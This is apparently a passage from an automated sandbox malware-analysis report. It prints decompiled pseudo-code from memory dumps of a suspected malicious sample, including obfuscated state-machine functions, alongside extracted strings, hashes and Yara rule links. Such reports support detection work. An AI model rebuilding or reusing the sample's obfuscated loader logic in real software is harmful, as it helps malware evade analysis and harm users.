				_t415[6] = _t415[6] ^ 0x49279530;
				_t398 = _t415[0x1c];
				_t354 = _t415[0x1c];
				_t413 = _t415[0x1c];
				_t409 = _t415[0x1c];
				_t415[6] = _t415[6] * 0x58;
				_t415[6] = _t415[6] ^ 0x2550aeb3;
				_t415[0xe] = 0x734937;
				_t415[0xe] = _t415[0xe] >> 4;
				_t415[0xe] = _t415[0xe] * 0x46;
				_t415[0xe] = _t415[0xe] + 0xffffec0c;
				_t415[0xe] = _t415[0xe] ^ 0x01f29f0c;
				_t415[0x1e] = 0x9dde4a;
				_t415[0x1e] = _t415[0x1e] << 2;
				_t415[0x1e] = _t415[0x1e] ^ 0x027408c1;
				_t415[0x11] = 0x514540;
				_t415[0x11] = _t415[0x11] * 0x64;
				_t415[0x11] = _t415[0x11] >> 8;
				_t415[0x11] = _t415[0x11] * 0x12;
				_t415[0x11] = _t415[0x11] ^ 0x0230d1c1;
				while(1) {
					_t331 = 0x60477d;
					L2:
					while(_t356 != 0x588675) {
						if(_t356 == _t331) {
							_t337 = E048D4D8D(_t354, _t415[0xf], _t415[0xd], _t409,  &(_t415[0x26]), _t398, _t415[0x24], _t356, _t415[0xd], _t356, _t356, _t415[0x10]);
							_t415 =  &(_t415[0xb]);
							__eflags = _t337;
							if(_t337 == 0) {
								_t338 = _t415[0x24];
							} else {
								_t411 = _t398;
								while(1) {
									__eflags =  *((intOrPtr*)(_t411 + 4)) - 4;
									if( *((intOrPtr*)(_t411 + 4)) != 4) {
										goto L17;
									}
									L16:
									_t341 = E048D17CB(_t411 + 0xc, _t415[0x18], _t415[0x15], _t413);
									__eflags = _t341;
									if(_t341 == 0) {
										_t338 = 1;
										_t415[0x24] = 1;
									} else {
										goto L17;
									}
									L22:
									_t409 = _t415[0x1c];
									goto L23;
									L17:
									_t340 =  *_t411;
									__eflags = _t340;
									if(_t340 == 0) {
										_t338 = _t415[0x24];
									} else {
										_t411 = _t411 + _t340;
										__eflags =  *((intOrPtr*)(_t411 + 4)) - 4;
										if( *((intOrPtr*)(_t411 + 4)) != 4) {
											goto L17;
										}
									}
									goto L22;
								}
							}
							L23:
							__eflags = _t338;
							if(__eflags == 0) {
								_t331 = 0x60477d;
								_t356 = 0x60477d;
								continue;
							} else {
								E048DA2AB( *((intOrPtr*)( *0x48e604c + 0x34)), _t415[7]);
								_t356 = 0xc6b09ff;
								while(1) {
									_t331 = 0x60477d;
									goto L2;
								}
							}
							L33:
						} else {
							if(_t356 == 0x19b0515) {
								_t409 = 0x1000;
								_push(_t356);
								_t415[0x1e] = 0x1000;
								_t398 = E048CF38A(0x1000);
								_t331 = 0x60477d;
								__eflags = _t398;
								_t356 =  !=  ? 0x60477d : 0x8867a89;
								continue;
							} else {
								if(_t356 == 0x7034cb8) {
									_t356 = 0x7eb64e3;
									continue;
								} else {
									if(_t356 == 0x7eb64e3) {
										E048DD617( &(_t415[0x27]), __eflags, _t415[0x1a], _t415[0x1d]);
										_t348 = E048D3FAE( &(_t415[0x29]), _t415[0x1a], _t415[0x26], _t415[0x1e], _t415[0xa]);
										_t413 = _t348;
										_t415 =  &(_t415[5]);
										_t356 = 0x588675;
										 *((short*)(_t348 - 2)) = 0;
										while(1) {
											_t331 = 0x60477d;
											goto L2;
										}
									} else {
										if(_t356 == 0x8867a89) {
											E048DA566(_t415[0x1e], _t415[0x11], _t354);
										} else {
											if(_t356 != 0xc6b09ff) {
												L29:
												__eflags = _t356 - 0xd51710d;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E048C2043(_t398, _t415[0xe], _t415[7], _t415[0xe]);
												_t356 = 0x8867a89;
												while(1) {
													_t331 = 0x60477d;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L32:
						__eflags = 0;
						return 0;
						goto L33;
					}
					_push(_t356);
					_t335 = E048D199D(_t415[0x23],  &(_t415[0x2d]), _t415[0x17], _t415[0x27], _t415[0x13], 0x2000000, 1, _t415[0x1b] | 0x00000006, _t415[0xd], _t415[0xa]);
					_t354 = _t335;
					_t415 =  &(_t415[0xa]);
					__eflags = _t335 - 0xffffffff;
					if(__eflags == 0) {
						_t356 = 0xd51710d;
						_t331 = 0x60477d;
						goto L29;
					} else {
						_t356 = 0x19b0515;
						continue;
					}
					goto L32;
				}
			}

0x048cec2d
0x048cec36
0x048cec3d
0x048cec42
0x048cec46
0x048cec4d
0x048cec54
0x048cec5c
0x048cec64
0x048cec68
0x048cec70
0x048cec78
0x048cec89
0x048cec8d
0x048cec95
0x048cec9d
0x048cecab
0x048cecb0
0x048cecb6
0x048cecbe
0x048cecc6
0x048cecce
0x048cecd3
0x048cecdb
0x048cece3
0x048cece8
0x048cecf0
0x048cecf8
0x048ced03
0x048ced0b
0x048ced16
0x048ced1e
0x048ced27
0x048ced2c
0x048ced32
0x048ced3a
0x048ced42
0x048ced4a
0x048ced56
0x048ced59
0x048ced63
0x048ced67
0x048ced6f
0x048ced7e
0x048ced7f
0x048ced83
0x048ced8b
0x048ced93
0x048ced9b
0x048ceda5
0x048ceda9
0x048cedb1
0x048cedb9
0x048cedc4
0x048cedcc
0x048cedd7
0x048ceddf
0x048ceded
0x048cedf1
0x048cedfb
0x048cee03
0x048cee1a
0x048cee1d
0x048cee21
0x048cee29
0x048cee31
0x048cee39
0x048cee41
0x048cee49
0x048cee51
0x048cee59
0x048cee5e
0x048cee66
0x048cee6e
0x048cee76
0x048cee7e
0x048cee83
0x048cee8b
0x048cee96
0x048ceea1
0x048ceeac
0x048ceeb4
0x048ceebc
0x048ceec4
0x048ceec9
0x048ceed1
0x048ceedc
0x048ceee7
0x048ceef2
0x048ceefa
0x048cef02
0x048cef0a
0x048cef12
0x048cef1a
0x048cef22
0x048cef2a
0x048cef32
0x048cef3a
0x048cef42
0x048cef4a
0x048cef57
0x048cef5b
0x048cef63
0x048cef6f
0x048cef74
0x048cef7a
0x048cef82
0x048cef8a
0x048cef9d
0x048cefa0
0x048cefa7
0x048cefb2
0x048cefc2
0x048cefc6
0x048cefce
0x048cefd3
0x048cefdb
0x048cefe3
0x048cefef
0x048ceff2
0x048ceff6
0x048ceffe
0x048cf006
0x048cf00e
0x048cf013
0x048cf020
0x048cf024
0x048cf028
0x048cf02c
0x048cf030
0x048cf034
0x048cf03c
0x048cf044
0x048cf04e
0x048cf052
0x048cf05a
0x048cf062
0x048cf06a
0x048cf06f
0x048cf077
0x048cf084
0x048cf088
0x048cf092
0x048cf096
0x048cf09e
0x048cf09e
0x00000000
0x048cf0a3
0x048cf0b1
0x048cf1be
0x048cf1c3
0x048cf1c6
0x048cf1c8
0x048cf1ff
0x048cf1ca
0x048cf1ca
0x048cf1cc
0x048cf1cc
0x048cf1d0
0x00000000
0x00000000
0x048cf1d2
0x048cf1de
0x048cf1e5
0x048cf1e7
0x048cf1f5
0x048cf1f6
0x00000000
0x00000000
0x00000000
0x048cf20f
0x048cf20f
0x00000000
0x048cf1e9
0x048cf1e9
0x048cf1eb
0x048cf1ed
0x048cf208
0x048cf1ef
0x048cf1ef
0x048cf1cc
0x048cf1d0
0x00000000
0x00000000
0x048cf1d0
0x00000000
0x048cf1ed
0x048cf1cc
0x048cf213
0x048cf213
0x048cf215
0x048cf23b
0x048cf240
0x00000000
0x048cf217
0x048cf22b
0x048cf231
0x048cf09e
0x048cf09e
0x00000000
0x048cf09e
0x048cf09e
0x00000000
0x048cf0b7
0x048cf0bd
0x048cf161
0x048cf16e
0x048cf170
0x048cf17a
0x048cf17c
0x048cf182
0x048cf189
0x00000000
0x048cf0c3
0x048cf0c9
0x048cf153
0x00000000
0x048cf0cf
0x048cf0d5
0x048cf11a
0x048cf139
0x048cf13e
0x048cf140
0x048cf145
0x048cf14a
0x048cf09e
0x048cf09e
0x00000000
0x048cf09e
0x048cf0d7
0x048cf0dd
0x048cf2b7
0x048cf0e3
0x048cf0e9
0x048cf2a0
0x048cf2a0
0x048cf2a6
0x00000000
0x00000000
0x048cf2ac
0x048cf0ef
0x048cf0fd
0x048cf104
0x048cf09e
0x048cf09e
0x00000000
0x048cf09e
0x048cf09e
0x048cf0e9
0x048cf0dd
0x048cf0d5
0x048cf0c9
0x048cf0bd
0x048cf2bd
0x048cf2c0
0x048cf2c9
0x00000000
0x048cf2c9
0x048cf247
0x048cf27d
0x048cf282
0x048cf284
0x048cf287
0x048cf28a
0x048cf296
0x048cf29b
0x00000000
0x048cf28c
0x048cf28c
0x00000000
0x048cf28c
0x00000000
0x048cf28a

Strings

@EQ, xrefs: 048CF077
{2, xrefs: 048CEE21
y0D, xrefs: 048CEF42
>S, xrefs: 048CEE8B
0d, xrefs: 048CEC8D
qQ, xrefs: 048CF2A0
}G`, xrefs: 048CF17C
LMe, xrefs: 048CEE6E
}G`, xrefs: 048CF09E
}G`, xrefs: 048CF29B
7Is, xrefs: 048CF03C
!kP, xrefs: 048CECF8
}G`, xrefs: 048CF23B
qQ, xrefs: 048CF296

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotificationlstrcmpi
String ID: qQ$qQ$!kP$0d$7Is$@EQ$LMe$y0D${2$}G`$}G`$}G`$}G`$>S
API String ID: 697002652-321775154
Opcode ID: b41e33d2ddb4f1bebe2fae36b2931dc022c884c5e9535165c04305a8235f7b32
Instruction ID: 83df9beded172932bae2b7b2b86d9db2bc42ce19c475cf24e2b45d40772f3d76
Opcode Fuzzy Hash: b41e33d2ddb4f1bebe2fae36b2931dc022c884c5e9535165c04305a8235f7b32
Instruction Fuzzy Hash: B7F12F715083809FE368CF25C58965BFBE2FB84758F108E1DF29A862A0D7B5D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 048D1F6B, Relevance: 16.9, Strings: 13, Instructions: 604COMMON

Download Yara Rule

Strings

s, xrefs: 048D2545
)c', xrefs: 048D286F
t-!, xrefs: 048D1FCB
O;0, xrefs: 048D2931
(., xrefs: 048D225D
[S+, xrefs: 048D22C9
B=&, xrefs: 048D27B1
1{R, xrefs: 048D2693
c, xrefs: 048D2854
;>-, xrefs: 048D287F
~1, xrefs: 048D24E8
[ao, xrefs: 048D202B
2Y, xrefs: 048D26C7

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: s$)c'$1{R$2Y$;>-$B=&$O;0$[ao$[S+$c$t-!$~1$(.
API String ID: 2591292051-3687093388
Opcode ID: aaecf30532636b248031f5e8ad60e44863862d26a3bc915bc63991455f8446b6
Instruction ID: cc8d9813bf05a56b0c1d00180b126b9872247b620243618b99be3d84b2829792
Opcode Fuzzy Hash: aaecf30532636b248031f5e8ad60e44863862d26a3bc915bc63991455f8446b6
Instruction Fuzzy Hash: E172FF715093818BE378CF24C58AB9BBBE1BBC4308F108E1DE5DA96260D7B19949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 048DBFE8, Relevance: 14.2, Strings: 11, Instructions: 420COMMON

Download Yara Rule

Strings

1#[, xrefs: 048DC2BE
@cK, xrefs: 048DC68B
+b, xrefs: 048DC70D
"k, xrefs: 048DC4F7
N#/y, xrefs: 048DC03D
{/, xrefs: 048DC5C2
+b, xrefs: 048DC82B
FV, xrefs: 048DC34B
Kn?, xrefs: 048DC272
I!K, xrefs: 048DC62B
(Z, xrefs: 048DC441

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: +b$ +b$"k$(Z$1#[$@cK$FV$I!K$Kn?$N#/y${/
API String ID: 0-1219850661
Opcode ID: a6160cc21beccce20667d38fca730aad5e75c3ea4aa626a9b8089c6ecf152f93
Instruction ID: 42eefdec22462e7f8ff3139338acf8450fdca10b3fe63da54ab313e208a95e12
Opcode Fuzzy Hash: a6160cc21beccce20667d38fca730aad5e75c3ea4aa626a9b8089c6ecf152f93
Instruction Fuzzy Hash: 243236715093809FD3A8CF25C98AA5BFBE1FBC4718F108A1DE1C986260D7B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 10013EC9, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10013EC9(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed int _v72;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t62;
				signed int _t63;
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int _t79;
				short _t80;
				short _t87;
				short _t92;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr* _t118;

				_t115 = _a4;
				_t118 = __ecx;
				if(E1000CA01(__ecx, __eflags, _t115) == 0) {
					_t116 =  *((intOrPtr*)(_t115 + 4));
					_push(__ebx);
					_t100 = __ecx;
					_t60 = E10010069(__ecx);
					__eflags =  *(__ecx + 0x84) & 0x00000020;
					_v20 = _t60;
					if(( *(__ecx + 0x84) & 0x00000020) != 0) {
						L5:
						__eflags = _t116 - 0x200;
						if(_t116 < 0x200) {
							L7:
							__eflags = _t116 - 0xa0 - 9;
							if(__eflags > 0) {
								L30:
								_t62 = E1000F6AD(_t118);
								__eflags = _t62;
								if(_t62 == 0) {
									L32:
									__eflags = _v20;
									if(_v20 == 0) {
										L35:
										_t63 = IsWindow( *(_t118 + 0x20));
										__eflags = _t63;
										if(_t63 == 0) {
											L37:
											__eflags = 0;
											return 0;
										}
										return E1000D06F(_a4);
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t117 = _v20;
										_t67 =  *((intOrPtr*)( *_v20 + 0x108))(_a4);
										__eflags = _t67;
										if(_t67 != 0) {
											goto L1;
										}
										_t70 = E1000F66E(_t117);
										_v20 = _t70;
										__eflags = _t70;
										if(_t70 != 0) {
											continue;
										}
										goto L35;
									}
									goto L1;
								}
								__eflags =  *(_t62 + 0x68);
								if( *(_t62 + 0x68) != 0) {
									goto L37;
								}
								goto L32;
							}
							L8:
							_v16 = E1001F13B(0x201, _t100, _t116, _t118, __eflags);
							_t72 = _a4;
							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
							_v28.x =  *(_t72 + 0x14);
							ScreenToClient( *(_t118 + 0x20),  &_v28);
							E10041630(_t116,  &_v76, 0, 0x2c);
							_v76 = 0x30;
							_t79 =  *((intOrPtr*)( *_t118 + 0x74))(_v28.x, _v28.y,  &_v76);
							__eflags = _v40 - 0xffffffff;
							_v8 = _t79;
							if(__eflags != 0) {
								_push(_v40);
								E1003F6C3(0x201, _t116, _t118, __eflags);
							}
							__eflags = _t116 - 0x201;
							if(_t116 != 0x201) {
								L13:
								_v12 = _v12 & 0x00000000;
								__eflags = _t116 - 0x201;
								if(_t116 != 0x201) {
									_t92 = GetKeyState(1);
									__eflags = _t92;
									if(_t92 < 0) {
										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
									}
								}
								L16:
								__eflags = _v8;
								if(_v8 < 0) {
									L26:
									_t80 = GetKeyState(1);
									__eflags = _t80;
									if(_t80 >= 0) {
										L28:
										 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
										KillTimer( *(_t118 + 0x20), 0xe001);
										L29:
										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
										goto L30;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v12;
								if(_v12 != 0) {
									goto L26;
								}
								__eflags = _t116 - 0x202;
								if(_t116 != 0x202) {
									__eflags =  *(_t118 + 0x80) & 0x00000008;
									if(( *(_t118 + 0x80) & 0x00000008) != 0) {
										L25:
										 *((intOrPtr*)( *_t118 + 0x178))(_v8);
										goto L29;
									}
									_t87 = GetKeyState(1);
									__eflags = _t87;
									if(_t87 < 0) {
										goto L25;
									}
									_t111 = _v16;
									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
										goto L29;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E100132F4(_t118);
									goto L29;
								}
								 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
								_push(0xc8);
								_push(0xe001);
								goto L20;
							}
							__eflags = _v72 & 0x80000000;
							if((_v72 & 0x80000000) == 0) {
								goto L13;
							}
							_v12 = 1;
							goto L16;
						}
						__eflags = _t116 - 0x209;
						if(__eflags <= 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t116 - 0x201;
					if(_t116 == 0x201) {
						goto L5;
					}
					__eflags = _t116 - 0x202;
					if(_t116 != 0x202) {
						goto L30;
					}
					goto L5;
				}
				L1:
				return 1;
			}

0x10013ed3
0x10013ed7
0x10013ee0
0x10013eea
0x10013eed
0x10013eee
0x10013ef0
0x10013ef5
0x10013efc
0x10013f04
0x10013f16
0x10013f16
0x10013f1c
0x10013f26
0x10013f2c
0x10013f2f
0x1001406c
0x1001406e
0x10014074
0x10014076
0x1001407e
0x1001407e
0x10014082
0x100140aa
0x100140ad
0x100140b3
0x100140b5
0x100140c3
0x100140c3
0x00000000
0x100140c3
0x00000000
0x00000000
0x00000000
0x00000000
0x10014084
0x10014084
0x10014084
0x1001408e
0x10014094
0x10014096
0x00000000
0x00000000
0x1001409e
0x100140a3
0x100140a6
0x100140a8
0x00000000
0x00000000
0x00000000
0x100140a8
0x00000000
0x10014084
0x10014078
0x1001407c
0x00000000
0x00000000
0x00000000
0x1001407c
0x10013f35
0x10013f3a
0x10013f3d
0x10013f46
0x10013f50
0x10013f53
0x10013f61
0x10013f77
0x10013f7e
0x10013f81
0x10013f85
0x10013f88
0x10013f8a
0x10013f8d
0x10013f92
0x10013f93
0x10013f95
0x10013fa9
0x10013fa9
0x10013fad
0x10013faf
0x10013fb3
0x10013fb9
0x10013fbc
0x10013fc4
0x10013fc4
0x10013fbc
0x10013fc7
0x10013fc7
0x10013fcb
0x10014036
0x10014038
0x1001403e
0x10014041
0x10014049
0x1001404f
0x1001405d
0x10014063
0x10014069
0x00000000
0x10014069
0x10014043
0x10014047
0x00000000
0x00000000
0x00000000
0x10014047
0x10013fcd
0x10013fd1
0x00000000
0x00000000
0x10013fd3
0x10013fd9
0x10013ffa
0x10014001
0x10014027
0x1001402e
0x00000000
0x1001402e
0x10014005
0x1001400b
0x1001400e
0x00000000
0x00000000
0x10014013
0x10014016
0x10014019
0x00000000
0x00000000
0x1001401b
0x10014020
0x10013ff1
0x10013ff3
0x00000000
0x10013ff3
0x10013fe1
0x10013fe7
0x10013fec
0x00000000
0x10013fec
0x10013f97
0x10013f9e
0x00000000
0x00000000
0x10013fa0
0x00000000
0x10013fa0
0x10013f1e
0x10013f24
0x00000000
0x00000000
0x00000000
0x10013f24
0x10013f06
0x10013f08
0x00000000
0x00000000
0x10013f0a
0x10013f10
0x00000000
0x00000000
0x00000000
0x10013f10
0x10013ee2
0x00000000

APIs

ScreenToClient.USER32 ref: 10013F53
_memset.LIBCMT ref: 10013F61
IsWindow.USER32(?), ref: 100140AD

Strings

0, xrefs: 10013F77

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientScreenWindow_memset
String ID: 0
API String ID: 1268500159-4108050209
Opcode ID: b38af2afc60c435dd89c8479c5f2faaa31b4af0e4346beb78f65d39e661cedd8
Instruction ID: ba265d5377cefadee5164f3dca846175025d61e8540a832ff79c7baaf0148828
Opcode Fuzzy Hash: b38af2afc60c435dd89c8479c5f2faaa31b4af0e4346beb78f65d39e661cedd8
Instruction Fuzzy Hash: A251BF34A00205DFDB11DFA4C888BADBBF5EF48350F124169EA55AB2A1DB71DEC1CB41

Uniqueness

Uniqueness Score: -1.00%

Function 048CD223, Relevance: 14.1, Strings: 11, Instructions: 367COMMON

Download Yara Rule

Strings

@`, xrefs: 048CD719
@`, xrefs: 048CD8E3
"E, xrefs: 048CD407
lMr, xrefs: 048CD2B5
VX, xrefs: 048CD443
lQm, xrefs: 048CD5A2
_;Y, xrefs: 048CD378
, xrefs: 048CD8C7
8, xrefs: 048CD2AD
`qJ7, xrefs: 048CD5DC
a$c, xrefs: 048CD6C4

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: $"E$@`$@`$_;Y$`qJ7$a$c$lMr$lQm$VX$8
API String ID: 0-1043295566
Opcode ID: 82399b3b24c3c45da98bac622b8133891cfdfd653070293d70e8c8bb2405335f
Instruction ID: 26870eca2319c45d755f8ee164048031b32e7a446585284e7a2c1d2ed374ff46
Opcode Fuzzy Hash: 82399b3b24c3c45da98bac622b8133891cfdfd653070293d70e8c8bb2405335f
Instruction Fuzzy Hash: D7123FB11083809FD768DF24C589A5BFBE1FBC4748F108E1DE69A96260D7B5A948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048E292B, Relevance: 14.0, Strings: 11, Instructions: 257COMMON

Download Yara Rule

Strings

"IA, xrefs: 048E2C86
0s=, xrefs: 048E2D14
Ia, xrefs: 048E2A23
-Op, xrefs: 048E2BDE
BZ$, xrefs: 048E29DD
;, xrefs: 048E2AD8
%-?, xrefs: 048E2CB7
0s=, xrefs: 048E2D8D
> , xrefs: 048E2A5A
8{5, xrefs: 048E2A40
5A, xrefs: 048E2BBD

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: "IA$%-?$-Op$0s=$0s=$5A$8{5$> $BZ$$Ia$;
API String ID: 0-1228380503
Opcode ID: 42a2754256f1b399b638598d21a618cea8d3a6e20e7f0d5a59bc7486e37584dc
Instruction ID: 94fe0387d8a075b813bcb1165fd1ce0ca588ce8953f773c99ffedf9aca063aea
Opcode Fuzzy Hash: 42a2754256f1b399b638598d21a618cea8d3a6e20e7f0d5a59bc7486e37584dc
Instruction Fuzzy Hash: 34D12EB14083809FD768CF66C58A92BBBE1BBC5758F508E1DF29686260D7B19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048DB397, Relevance: 12.8, Strings: 10, Instructions: 321COMMON

Download Yara Rule

Strings

_L, xrefs: 048DB8B9
/, xrefs: 048DB894
zo, xrefs: 048DB479
,:6, xrefs: 048DB7CF
vC3, xrefs: 048DB5BD
[,#, xrefs: 048DB51B
U, xrefs: 048DB435
N3?, xrefs: 048DB90C
v?, xrefs: 048DB5EB
o*, xrefs: 048DB778

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: /$,:6$N3?$[,#$_L$o*$vC3$zo$v?$U
API String ID: 0-2508983956
Opcode ID: 4691600e7dc73165da49334b95e1759193728decef33a37c3bd47f114e1f514d
Instruction ID: 618e7c03c8286d5e1fe3af96234dcc29a2741c82075a4f2e824693a534d20976
Opcode Fuzzy Hash: 4691600e7dc73165da49334b95e1759193728decef33a37c3bd47f114e1f514d
Instruction Fuzzy Hash: F902E0B14093819FE3A9CF61C48AA5BFBE1BBC5358F108E1DE5D986220D7B49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048D44AA, Relevance: 12.8, Strings: 10, Instructions: 316COMMON

Download Yara Rule

Strings

>z, xrefs: 048D47BD
[X@, xrefs: 048D4871
sr{, xrefs: 048D4930
O, xrefs: 048D46F9
^rnd, xrefs: 048D4802
nY, xrefs: 048D46DF
rw, xrefs: 048D4965
SJT, xrefs: 048D4640
mF2, xrefs: 048D46D7
-u, xrefs: 048D49DB

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: mF2$-u$>z$O$SJT$[X@$^rnd$nY$rw$sr{
API String ID: 0-1390466442
Opcode ID: 67f4c5a7bae06be8aecfa09cdf2afed93173121a3b2577d3eb0d46acf0c73a34
Instruction ID: 5b2d1e6c48ab907538c8412c677584fa1dcf329ecf64a9b6d9debdde9ce943d6
Opcode Fuzzy Hash: 67f4c5a7bae06be8aecfa09cdf2afed93173121a3b2577d3eb0d46acf0c73a34
Instruction Fuzzy Hash: 4CF12D725093809FD3A8CF65C58AA5BFBE1BBC5748F108A0DF29986260D7B19949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 100331CA, Relevance: 12.1, APIs: 8, Instructions: 125
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E100331CA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t45;
				long _t46;
				CHAR* _t50;
				CHAR* _t55;
				void* _t57;
				int _t63;
				CHAR* _t73;
				void* _t86;
				CHAR* _t90;
				long _t92;
				void* _t93;
				CHAR* _t98;
				CHAR* _t100;

				_t91 = __esi;
				_push(0x158);
				E10041D14(0x10053b5f, __ebx, __edi, __esi);
				_t90 =  *(_t93 + 8);
				_t45 =  *(_t93 + 0xc);
				_t73 =  *(_t93 + 0x10);
				_t98 = _t90;
				_t75 = 0 | _t98 != 0x00000000;
				 *(_t93 - 0x158) = _t45;
				_t99 = _t98 != 0;
				if(_t98 != 0) {
					L2:
					_t100 = _t45;
					_t75 = 0 | _t100 != 0x00000000;
					if(_t100 != 0) {
						goto L1;
					}
					_t77 = _t93 - 0x15c;
					_t92 = 0x104;
					_t46 = GetFullPathNameA(_t45, 0x104, _t90, _t93 - 0x15c);
					if(_t46 != 0) {
						__eflags = _t46 - 0x104;
						if(_t46 < 0x104) {
							E10001670(_t93 - 0x154);
							 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
							E10033039(__eflags, _t90, _t93 - 0x154);
							_t50 = PathIsUNCA( *(_t93 - 0x154));
							__eflags = _t50;
							if(_t50 != 0) {
								L21:
								E10001020( &(( *(_t93 - 0x154))[0xfffffffffffffff0]));
								__eflags = 1;
								goto L22;
							}
							_t55 = GetVolumeInformationA( *(_t93 - 0x154), _t50, _t50, _t50, _t93 - 0x164, _t93 - 0x160, _t50, _t50);
							__eflags = _t55;
							if(_t55 != 0) {
								__eflags =  *(_t93 - 0x160) & 0x00000002;
								if(( *(_t93 - 0x160) & 0x00000002) == 0) {
									CharUpperA(_t90);
								}
								__eflags =  *(_t93 - 0x160) & 0x00000004;
								if(( *(_t93 - 0x160) & 0x00000004) == 0) {
									_t57 = FindFirstFileA( *(_t93 - 0x158), _t93 - 0x150);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										goto L21;
									}
									FindClose(_t57);
									__eflags =  *(_t93 - 0x15c);
									if( *(_t93 - 0x15c) == 0) {
										goto L11;
									}
									__eflags =  *(_t93 - 0x15c) - _t90;
									if( *(_t93 - 0x15c) <= _t90) {
										goto L11;
									}
									_t63 = lstrlenA(_t93 - 0x124);
									_t86 =  *(_t93 - 0x15c) - _t90;
									__eflags = _t63 + _t86 - _t92;
									if(_t63 + _t86 >= _t92) {
										__eflags = _t73;
										if(_t73 != 0) {
											_t73[8] = 3;
											E10002700( &(_t73[0x10]),  *(_t93 - 0x158));
										}
										L12:
										E10001020( &(( *(_t93 - 0x154))[0xfffffffffffffff0]));
										goto L5;
									}
									__eflags = _t92;
									E10019982( *(_t93 - 0x15c), _t92, _t93 - 0x124);
